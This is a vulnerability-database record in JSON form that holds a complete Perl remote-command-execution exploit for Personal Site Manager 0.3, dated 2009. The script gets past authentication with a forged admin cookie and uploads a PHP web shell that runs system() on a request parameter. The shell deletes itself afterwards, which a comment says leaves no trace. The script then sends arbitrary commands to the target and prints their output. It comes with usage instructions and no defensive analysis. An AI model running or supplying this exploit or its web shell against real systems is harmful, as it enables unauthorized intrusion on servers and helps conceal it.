Description
No description provided by source.
{"sourceData": "\n # --+++===========================================================================+++--\n# --+++====== Personal Site Manager <= 0.3 Remote Command Execution Exploit ======+++--\n# --+++===========================================================================+++--\n\n#!/usr/bin/perl\n\nuse strict;\nuse warnings;\nuse LWP::UserAgent;\nuse HTTP::Request::Common;\nuse IO::Socket;\n\nmy $hostname = shift;\nmy $path = shift;\nmy $cmd = join " ", @ARGV;\n\nusage () if (!$path);\n\nopen SHELL, ">shell.php";\n\n# shell.php will be delete, it won't leave any trace about exploit's run\nprint SHELL "<? system (\\$_GET ['cmd']); unlink ('shell.php'); ?>";\nclose SHELL;\n\nmy $url = "http://${hostname}${path}/psm/upload_file.php?submit=banane";\nmy $lwp = LWP::UserAgent->new;\n\n# This CMS is also vulnerable to Insicure Cookie Handling\n$lwp->default_header('Cookie' => "PSMADMIN=true");\n\nmy $req = $lwp->request (\n POST $url,\n Content_Type => 'multipart/form-data',\n Content => [upload => ["shell.php"]],\n );\nunlink ("shell.php");\n\nif ($req->is_success)\n{\n my $sock = new IO::Socket::INET (\n PeerHost => $hostname,\n PeerPort => 80,\n Proto => "tcp",\n );\n print "\\n[+] Running ${cmd}...\\n\\n";\n $cmd =~ s/ /%20/g;\n print $sock "GET ${path}/psm/datastore/files/shell.php?cmd=${cmd}\\r\\n\\r\\n";\n \n print $_ while (<$sock>);\n\n close ($sock);\n print "\\n";\n}\nelse\n{\n print "[-] Unable to end execution.\\n";\n}\n\nsub usage\n{\n die "\\n[+] Personal Site Manager <= 0.3 Remote Command Execution Exploit".\n "\\n[+] Author : darkjoker".\n "\\n[+] Site : http://darkjoker.net23.net".\n "\\n[+] Download: http://garr.dl.sourceforge.net/sourceforge/psm/psm_0_3.zip".\n "\\n[+] Usage : perl ${0} <hostname> <path> <cmd>".\n "\\n[+] Ex. : perl ${0} localhost /PSM ls -l".\n "\\n\\n";\n}\n\n# milw0rm.com [2009-01-29]\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-17799", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-17799", "type": "seebug", "viewCount": 3, "references": [], "lastseen": "2017-11-19T19:00:42", "published": "2009-01-29T00:00:00", "cvelist": [], "id": "SSV:17799", "enchantments_done": [], "modified": "2009-01-29T00:00:00", "title": "Personal Site Manager <= 0.3 Remote Command Execution Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645340155}}
{}